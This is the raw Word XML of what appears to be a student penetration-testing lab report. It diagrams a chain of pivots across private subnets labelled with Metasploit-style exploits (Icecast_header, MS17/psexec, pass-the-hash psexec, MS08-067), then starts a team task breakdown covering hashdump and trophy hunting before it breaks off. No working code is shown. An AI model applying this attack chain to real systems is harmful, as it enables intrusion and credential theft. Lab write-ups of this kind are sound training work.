                    <w:p w14:paraId="7BBDB5F6" w14:textId="64C45EAA" w:rsidR="0095055D" w:rsidRDefault="0095055D" w:rsidP="0095055D">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>192.168.91.</w:t>
                      </w:r>
                      <w:r>
                        <w:t>22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171000B" w14:textId="21114AE4" w:rsidR="00326FC5" w:rsidRDefault="0095055D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7683B" wp14:editId="3FBA72D1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2935605</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>95884</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="45719" cy="568325"/>
                <wp:effectExtent l="0" t="38100" r="170815" b="15875"/>
                <wp:wrapNone/>
                <wp:docPr id="1083411118" name="Curved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68325"/>
                        </a:xfrm>
                        <a:prstGeom prst="curvedConnector3">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val -3411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F926A" id="Curved Connector 27" o:spid="_x0000_s1026" type="#_x0000_t38" style="position:absolute;margin-left:231.15pt;margin-top:7.55pt;width:3.6pt;height:44.7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" adj="-73680" strokecolor="#156082 [3204]" strokeweight=".5pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BB7B9B" w14:textId="64C47BE8" w:rsidR="00326FC5" w:rsidRDefault="00326FC5" w:rsidP="005F107C"/>
    <w:p w14:paraId="4EA67DD7" w14:textId="53D6A00E" w:rsidR="00326FC5" w:rsidRDefault="00587BF0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D03D6A" wp14:editId="1C06D11B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5276850</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>177800</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1285875" cy="495300"/>
                <wp:effectExtent l="0" t="0" r="9525" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="293211482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71DCE" w14:textId="0D4B5F0C" w:rsidR="00587BF0" w:rsidRDefault="00587BF0" w:rsidP="00587BF0">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>192.168.93.255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D03D6A" id="_x0000_s1037" style="position:absolute;margin-left:415.5pt;margin-top:14pt;width:101.25pt;height:39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" fillcolor="white [3201]" strokecolor="#e97132 [3205]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7A871DCE" w14:textId="0D4B5F0C" w:rsidR="00587BF0" w:rsidRDefault="00587BF0" w:rsidP="00587BF0">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>192.168.9</w:t>
                      </w:r>
                      <w:r>
                        <w:t>3</w:t>
                      </w:r>
                      <w:r>
                        <w:t>.</w:t>
                      </w:r>
                      <w:r>
                        <w:t>255</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AA03B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132D32" wp14:editId="6BAA942F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1571625</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>73025</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1438275" cy="495300"/>
                <wp:effectExtent l="0" t="0" r="9525" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="1111309442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37A4CC" w14:textId="1F249693" w:rsidR="0095055D" w:rsidRDefault="0095055D" w:rsidP="0095055D">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>192.168.91.201-</w:t>
                            </w:r>
                            <w:r w:rsidR="00F22AAA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C132D32" id="_x0000_s1038" style="position:absolute;margin-left:123.75pt;margin-top:5.75pt;width:113.25pt;height:39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" fillcolor="white [3201]" strokecolor="#4ea72e [3209]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2337A4CC" w14:textId="1F249693" w:rsidR="0095055D" w:rsidRDefault="0095055D" w:rsidP="0095055D">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>1</w:t>
                      </w:r>
                      <w:r>
                        <w:t>92</w:t>
                      </w:r>
                      <w:r>
                        <w:t>.1</w:t>
                      </w:r>
                      <w:r>
                        <w:t>68</w:t>
                      </w:r>
                      <w:r>
                        <w:t>.</w:t>
                      </w:r>
                      <w:r>
                        <w:t>91</w:t>
                      </w:r>
                      <w:r>
                        <w:t>.20</w:t>
                      </w:r>
                      <w:r>
                        <w:t>1-</w:t>
                      </w:r>
                      <w:r w:rsidR="00F22AAA">
                        <w:t>4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46B2D27" w14:textId="7D0CA872" w:rsidR="0095055D" w:rsidRDefault="00AA03B0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347484" wp14:editId="3769F497">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3533775</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>21590</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1285875" cy="495300"/>
                <wp:effectExtent l="0" t="0" r="9525" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="178660191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F362F" w14:textId="10617DD3" w:rsidR="0095055D" w:rsidRDefault="0095055D" w:rsidP="0095055D">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>192.168.92.</w:t>
                            </w:r>
                            <w:r w:rsidR="00AA03B0">
                              <w:t>135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47484" id="_x0000_s1039" style="position:absolute;margin-left:278.25pt;margin-top:1.7pt;width:101.25pt;height:39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" fillcolor="white [3201]" strokecolor="#e97132 [3205]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5EFF362F" w14:textId="10617DD3" w:rsidR="0095055D" w:rsidRDefault="0095055D" w:rsidP="0095055D">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>192.168.92.</w:t>
                      </w:r>
                      <w:r w:rsidR="00AA03B0">
                        <w:t>135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512E156" w14:textId="540C4F65" w:rsidR="0095055D" w:rsidRDefault="0095055D" w:rsidP="005F107C"/>
    <w:p w14:paraId="4E8FDE82" w14:textId="05DEEF35" w:rsidR="0095055D" w:rsidRDefault="0095055D" w:rsidP="005F107C"/>
    <w:p w14:paraId="4DC2B324" w14:textId="5EE0BFF6" w:rsidR="0095055D" w:rsidRDefault="0095055D" w:rsidP="005F107C"/>
    <w:p w14:paraId="02460330" w14:textId="6F311974" w:rsidR="0095055D" w:rsidRDefault="00F22AAA" w:rsidP="005F107C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663A42" wp14:editId="731201D5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-3175</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>127635</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="485775" cy="200025"/>
                <wp:effectExtent l="12700" t="12700" r="9525" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="2064488092" name="Left-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5775" cy="200025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4767D" id="Left-Right Arrow 28" o:spid="_x0000_s1026" type="#_x0000_t69" style="position:absolute;margin-left:-.25pt;margin-top:10.05pt;width:38.25pt;height:15.7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" adj="4447" fillcolor="#156082 [3204]" strokecolor="#030e13 [484]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8E2463" w14:textId="5F57792F" w:rsidR="0095055D" w:rsidRDefault="00587BF0" w:rsidP="005F107C">
      <w:r>
        <w:t xml:space="preserve">                   = Same system connected</w:t>
      </w:r>
      <w:r w:rsidR="00F22AAA">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:t>/present in different layers</w:t>
      </w:r>
      <w:r w:rsidR="00AA03B0">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A758E5" w14:textId="410DEBD9" w:rsidR="0095055D" w:rsidRDefault="00587BF0" w:rsidP="005F107C">
      <w:r>
        <w:t xml:space="preserve">**This diagram does not include all the systems discovered or present in the network/layer. It only </w:t>
      </w:r>
      <w:r w:rsidR="004244CF">
        <w:t>includes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> significantly used ones</w:t>
      </w:r>
      <w:r w:rsidR="004244CF">
        <w:t xml:space="preserve"> from above</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to paint picture.</w:t>
      </w:r>
      <w:r w:rsidR="004244CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ED32CB" w14:textId="0D495AF5" w:rsidR="007329A8" w:rsidRPr="007329A8" w:rsidRDefault="007329A8" w:rsidP="005F107C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/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411A10AF" wp14:editId="3B12BBDE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4581525</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-9525</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1285875" cy="495300"/>
                <wp:effectExtent l="0" t="0" r="9525" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="1404374358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79058" w14:textId="77777777" w:rsidR="007329A8" w:rsidRDefault="007329A8" w:rsidP="007329A8">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>192.168.91.22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11A10AF" id="_x0000_s1040" style="position:absolute;margin-left:360.75pt;margin-top:-.75pt;width:101.25pt;height:39pt;z-index:2516551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" fillcolor="white [3201]" strokecolor="#4ea72e [3209]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5B079058" w14:textId="77777777" w:rsidR="007329A8" w:rsidRDefault="007329A8" w:rsidP="007329A8">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>192.168.91.22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9269EF" wp14:editId="72E32EFD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2114550</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-9525</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1438275" cy="495300"/>
                <wp:effectExtent l="0" t="0" r="9525" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="1714450579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E565C4" w14:textId="3673EEBA" w:rsidR="007329A8" w:rsidRDefault="007329A8" w:rsidP="007329A8">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>192.168.91.20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9269EF" id="_x0000_s1041" style="position:absolute;margin-left:166.5pt;margin-top:-.75pt;width:113.25pt;height:39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" fillcolor="white [3201]" strokecolor="#4ea72e [3209]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="11E565C4" w14:textId="3673EEBA" w:rsidR="007329A8" w:rsidRDefault="007329A8" w:rsidP="007329A8">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>192.168.91.20</w:t>
                      </w:r>
                      <w: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A13F0A1" wp14:editId="0A03226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09675" cy="495300"/>
                <wp:effectExtent l="0" t="0" r="9525" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="1937156625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7BA3D" w14:textId="77777777" w:rsidR="007329A8" w:rsidRDefault="007329A8" w:rsidP="007329A8">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>172.17.17.203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13F0A1" id="_x0000_s1042" style="position:absolute;margin-left:0;margin-top:0;width:95.25pt;height:39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" fillcolor="white [3201]" strokecolor="#0f9ed5 [3207]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5577BA3D" w14:textId="77777777" w:rsidR="007329A8" w:rsidRDefault="007329A8" w:rsidP="007329A8">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>172.17.17.203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</w:rPr>
        <w:t xml:space="preserve">                                         </w:t>
      </w:r>
      <w:r w:rsidRPr="007329A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Icecast_header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                   psexec_ms17            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719C4910" w14:textId="35588FAC" w:rsidR="007329A8" w:rsidRDefault="007329A8" w:rsidP="005F107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8C7CC6" wp14:editId="3DDEA202">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3552825</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>60325</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1028700" cy="0"/>
                <wp:effectExtent l="0" t="63500" r="0" b="63500"/>
                <wp:wrapNone/>
                <wp:docPr id="543183731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00BB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279.75pt;margin-top:4.75pt;width:81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" strokecolor="#156082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00B429" wp14:editId="02E2CBA3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1209675</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>61595</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="904875" cy="0"/>
                <wp:effectExtent l="0" t="50800" r="0" b="76200"/>
                <wp:wrapNone/>
                <wp:docPr id="1986475065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846FBD" id="Straight Arrow Connector 28" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:95.25pt;margin-top:4.85pt;width:71.25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" strokecolor="#156082 [3204]" strokeweight=".5pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACA7A2F" w14:textId="50A1C0EC" w:rsidR="007329A8" w:rsidRDefault="007329A8" w:rsidP="005F107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87310BF" wp14:editId="5EC73EB1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3886200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>175895</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="695325" cy="552450"/>
                <wp:effectExtent l="25400" t="0" r="15875" b="31750"/>
                <wp:wrapNone/>
                <wp:docPr id="865246397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5325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936ED" id="Straight Arrow Connector 31" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:306pt;margin-top:13.85pt;width:54.75pt;height:43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" strokecolor="#156082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BE9CB0" wp14:editId="75B928CC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5210175</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>185420</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="0" cy="542925"/>
                <wp:effectExtent l="63500" t="0" r="38100" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="1909040168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36D4E4" id="Straight Arrow Connector 30" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:410.25pt;margin-top:14.6pt;width:0;height:42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" strokecolor="#156082 [3204]" strokeweight=".5pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB832EB" w14:textId="77777777" w:rsidR="007329A8" w:rsidRDefault="007329A8" w:rsidP="005F107C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72A0F194" w14:textId="1A97DD25" w:rsidR="007329A8" w:rsidRPr="007329A8" w:rsidRDefault="007329A8" w:rsidP="005F107C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">               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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="007329A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>se</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>xec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Jeffrey)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (admin hash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E81C9D4" w14:textId="114C71B7" w:rsidR="007329A8" w:rsidRDefault="007329A8" w:rsidP="005F107C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DAA673" w14:textId="371DB127" w:rsidR="007329A8" w:rsidRDefault="007329A8" w:rsidP="005F107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246647" wp14:editId="272CEDF4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>781050</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>42545</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1285875" cy="495300"/>
                <wp:effectExtent l="0" t="0" r="9525" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="186678354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BE166" w14:textId="77777777" w:rsidR="007329A8" w:rsidRDefault="007329A8" w:rsidP="007329A8">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>192.168.93.100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246647" id="_x0000_s1043" style="position:absolute;margin-left:61.5pt;margin-top:3.35pt;width:101.25pt;height:39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" fillcolor="white [3201]" strokecolor="#e97132 [3205]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="49ABE166" w14:textId="77777777" w:rsidR="007329A8" w:rsidRDefault="007329A8" w:rsidP="007329A8">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>192.168.93.100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A7E06F3" wp14:editId="1B20FB72">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2952750</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>46990</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1285875" cy="495300"/>
                <wp:effectExtent l="0" t="0" r="9525" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="746125300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0EE20C" w14:textId="77777777" w:rsidR="007329A8" w:rsidRDefault="007329A8" w:rsidP="007329A8">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>192.168.92.31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7E06F3" id="_x0000_s1044" style="position:absolute;margin-left:232.5pt;margin-top:3.7pt;width:101.25pt;height:39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" fillcolor="white [3201]" strokecolor="#e97132 [3205]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="590EE20C" w14:textId="77777777" w:rsidR="007329A8" w:rsidRDefault="007329A8" w:rsidP="007329A8">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>192.168.92.31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167A34" wp14:editId="63544639">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4581525</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>42545</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1285875" cy="495300"/>
                <wp:effectExtent l="0" t="0" r="9525" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="1190858425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D9AE23" w14:textId="77777777" w:rsidR="007329A8" w:rsidRDefault="007329A8" w:rsidP="007329A8">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>192.168.91.1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167A34" id="_x0000_s1045" style="position:absolute;margin-left:360.75pt;margin-top:3.35pt;width:101.25pt;height:39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" fillcolor="white [3201]" strokecolor="#4ea72e [3209]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="53D9AE23" w14:textId="77777777" w:rsidR="007329A8" w:rsidRDefault="007329A8" w:rsidP="007329A8">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>192.168.91.1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51875E6" w14:textId="37F52D09" w:rsidR="007329A8" w:rsidRDefault="007329A8" w:rsidP="005F107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  </w:t>
      </w:r>
      <w:r w:rsidRPr="007329A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Ms08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>_067_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E487770" w14:textId="53CD769A" w:rsidR="007329A8" w:rsidRDefault="007329A8" w:rsidP="005F107C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E1ACA1E" wp14:editId="57686254">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2066925</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>50165</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="885825" cy="0"/>
                <wp:effectExtent l="0" t="50800" r="0" b="76200"/>
                <wp:wrapNone/>
                <wp:docPr id="1653323913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34E766" id="Straight Arrow Connector 32" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:162.75pt;margin-top:3.95pt;width:69.75pt;height:0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" strokecolor="#156082 [3204]" strokeweight=".5pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B48C9A" w14:textId="77777777" w:rsidR="007329A8" w:rsidRDefault="007329A8" w:rsidP="005F107C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5747E120" w14:textId="2D1AD044" w:rsidR="00426FE3" w:rsidRPr="003121C8" w:rsidRDefault="00426FE3" w:rsidP="005F107C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003121C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3AED41" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRPr="009155AC" w:rsidRDefault="00426FE3" w:rsidP="005F107C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D972DC3" w14:textId="77777777" w:rsidR="00F22AAA" w:rsidRDefault="00426FE3" w:rsidP="00EB71E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Initial</w:t>
      </w:r>
      <w:r w:rsidR="002626EF">
        <w:t xml:space="preserve"> plan of the group is that </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">all 3 members </w:t>
      </w:r>
      <w:r w:rsidR="002626EF">
        <w:t xml:space="preserve">will try </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to get into a different system from </w:t>
      </w:r>
      <w:r w:rsidR="00F22AAA">
        <w:t>192.168.91.</w:t>
      </w:r>
      <w:r>
        <w:t>201 to 204. After that</w:t>
      </w:r>
      <w:r w:rsidR="002626EF">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> main goal is to reach end as soon as possible before looking for trophies as more people try to exploit </w:t>
      </w:r>
      <w:r w:rsidR="00F22AAA">
        <w:t xml:space="preserve">same system, </w:t>
      </w:r>
      <w:r w:rsidR="002626EF">
        <w:t xml:space="preserve">there is high probability of multiple </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">crashes and </w:t>
      </w:r>
      <w:r w:rsidR="002626EF">
        <w:t xml:space="preserve">delays to </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">further proceed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67472A42" w14:textId="6C89CD55" w:rsidR="005F107C" w:rsidRDefault="00426FE3" w:rsidP="00EB71E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Roles</w:t>
      </w:r>
      <w:r w:rsidR="006F1EAC">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00426FE3">
        <w:t xml:space="preserve">Caleb Carpenter </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426FE3">
        <w:t>Danillo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00426FE3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426FE3">
        <w:t>Miqui</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00853C53">
        <w:t xml:space="preserve">took </w:t>
      </w:r>
      <w:r w:rsidR="006F1EAC">
        <w:t xml:space="preserve">lead in </w:t>
      </w:r>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidR="006F1EAC">
        <w:t>ing,</w:t>
      </w:r>
      <w:r w:rsidR="00853C53">
        <w:t xml:space="preserve"> I also helped in exploiting but simultaneously did network scanning and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006F1EAC">
        <w:t>look</w:t>
      </w:r>
      <w:r w:rsidR="00853C53">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="006F1EAC">
        <w:t xml:space="preserve"> into</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006F1EAC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00853C53">
        <w:t>hashdump</w:t>
      </w:r>
      <w:r w:rsidR="006F1EAC">
        <w:t xml:space="preserve"> and files for trophies. As I f</w:t>
      </w:r>
      <w:r w:rsidR="00853C53">
        <w:t>oun</w:t>
      </w:r>
      <w:r w:rsidR="006F1EAC">
        <w:t xml:space="preserve">d them, I </w:t>
      </w:r>
      <w:r w:rsidR="00853C53">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="006F1EAC">
        <w:t>instruct</w:t>
      </w:r>
      <w:r w:rsidR="00853C53">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="006F1EAC">
